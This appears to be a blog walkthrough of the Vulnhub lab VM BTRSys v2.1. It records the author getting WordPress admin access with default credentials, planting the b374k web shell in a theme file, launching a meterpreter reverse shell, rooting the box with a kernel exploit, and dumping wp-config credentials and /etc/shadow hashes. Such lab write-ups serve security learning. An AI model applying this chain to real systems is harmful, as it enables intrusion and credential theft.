Vulnhub: Resimler: BTRSys v2.1

OK one last Vulnhub VM for today, this time is the second in the series: Resimler: BTRSys v2.1, This one is a bit more difficult than the previous, but only marginally.

Getting this VM up and running is a pain, first time I tried to import it in vmware it complained about the vmdk, it’s a simple fix, the name is wrong in the .ova, simply open it in a text editor and rename the file it is looking for to the correct one.

First things first, a portscan.. we get the following:
21 – vsftpd 3.0.3
22 – OpenSSH 7.2p2 Ubuntu 4ubuntu2.1
80 – Apache httpd 2.4.18

Again FTP allows anonymous login but nothing there.

Loading the webapp in a browser we are greeted with a gif of a snake but not much else. Examining robots.txt gives us /wordpress/.

So I kick off the usual tools, wpscan, nikto and dirb (with seclists big.txt).

Nikto doesn’t give much useful information, and the best dirb gives is /upload/ which simply reply’s with:
Connection failed: SQLSTATE[HY000] [1049] Unknown database ‘Lepton’

WPscan however lists a whole host of issues, here is a snippet of what I found:

[!] The WordPress 'http://192.168.1.144/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://192.168.1.144/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.1.144/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.1.144/wordpress/wp-includes/

[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers

- loads of vulns as old version -

[+] Identified the following 2 user/s:
    +----+--------+--------+
    | Id | Login  | Name   |
    +----+--------+--------+
    | 1  | btrisk | btrisk |
    | 2  | admin  | admin  |
    +----+--------+--------+

I try both usernames with the username as the password and log in with the username/password of admin/admin. That was surprisingly easy!

Once in I used the “edit themes” option to edit “content-audio.php” to contain the b374k php webshell. I visited the url in a browser and was greeted with a webshell. from there I pulled the wp-config.php

	define('DB_NAME', 'wordpress');
	define('DB_USER', 'root');
	define('DB_PASSWORD', 'rootpassword!');
	define('DB_HOST', 'localhost');

And /etc/password file which turned out to ultimately be no use. After realizing that python wasn’t installed I uploaded LinEnum.sh to /tmp, chmoded it and ran to get the following:

Linux version 4.4.0-62-generic (buildd@lcy01-30) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4)
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"

Running out of ideas I uploaded a meterpreter reverse shell and launched. from there I could spawn a shell using:  /usr/bin/python3.5 -c ‘import pty; pty.spawn(“/bin/sh”)’

There didn’t seem to be any suid binaries to exploit so I did a quick google for kernal exploits which led me to: https://www.exploit-db.com/exploits/41458/

The machine didn’t have GCC installed and the version I did find on it I didn’t have permissions to use. So compile that locally, upload. Then ran the following:

$ chmod +x pwn
chmod +x pwn
$ ./pwn
./pwn
[.] namespace sandbox setup successfully
[.] disabling SMEP & SMAP
[.] scheduling 0xffffffff81064550(0x406e0)
[.] waiting for the timer to execute
[.] done
[.] SMEP & SMAP should be off now
[.] getting root
[.] executing 0x55e02688defd
[.] done
[.] should be root now
[.] checking if we got root
[+] got r00t ^_^
[!] don't kill the exploit binary, the kernel will crash
root@ubuntu:/tmp#

And that is game over 🙂
Again there was no flag in /root so I grabbed the shadow files as proof. I haven’t cracked the hashes as I don’t see the point already having a root shell.

root@ubuntu:/root# ls -la
ls -la
total 32
drwx------  4 root root 4096 Apr 28 02:24 .
drwxr-xr-x 22 root root 4096 Mar 17  2017 ..
-rw-------  1 root root  505 May  2 08:57 .bash_history
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwx------  2 root root 4096 Apr 28 02:24 .cache
-rw-------  1 root root  215 Apr 27 12:11 .mysql_history
drwxr-xr-x  2 root root 4096 Mar 21  2017 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile

root@ubuntu:/root# cat /etc/shadow
cat /etc/shadow
root:$6$pYiSm10w$A7g2nH1EXRcIZxLgE3gRR.F.Rlq0gSpyWMqQjD/19U4s2xjtbNsiw.PV1Fevp23QOOj5tEm8CFGqagoodunMG.:17284:0:99999:7:::
daemon:*:17212:0:99999:7:::
bin:*:17212:0:99999:7:::
sys:*:17212:0:99999:7:::
sync:*:17212:0:99999:7:::
games:*:17212:0:99999:7:::
man:*:17212:0:99999:7:::
lp:*:17212:0:99999:7:::
mail:*:17212:0:99999:7:::
news:*:17212:0:99999:7:::
uucp:*:17212:0:99999:7:::
proxy:*:17212:0:99999:7:::
www-data:$6$reqtjqmt$mDDXv45UPmRm7bwQYICkDFiVvGTLGaJyX.w16Sg7PNY9xMwlhIwebUSgF0hGjgKo1ku9IyfX0YdqDQHhBELZ2.:17283:0:99999:7:::
backup:*:17212:0:99999:7:::
list:*:17212:0:99999:7:::
irc:*:17212:0:99999:7:::
gnats:*:17212:0:99999:7:::
nobody:*:17212:0:99999:7:::
systemd-timesync:*:17212:0:99999:7:::
systemd-network:*:17212:0:99999:7:::
systemd-resolve:*:17212:0:99999:7:::
systemd-bus-proxy:*:17212:0:99999:7:::
syslog:*:17212:0:99999:7:::
_apt:*:17212:0:99999:7:::
messagebus:*:17242:0:99999:7:::
uuidd:*:17242:0:99999:7:::
btrisk:$6$pR7v.zmh$RGoeByixIOkiz8haCi3nFN2l8VtT/VjPJo6nO1jmpKdBbHcL6FMdb09Uq51sjY0M/HVZ8xF9lNjAHEoe1jAzn.:17284:0:99999:7:::
mysql:!:17242:0:99999:7:::
ftp:*:17245:0:99999:7:::
sshd:*:17246:0:99999:7:::

Thanks for another fun Boot2Root @ismailonderkaya

Leave a Reply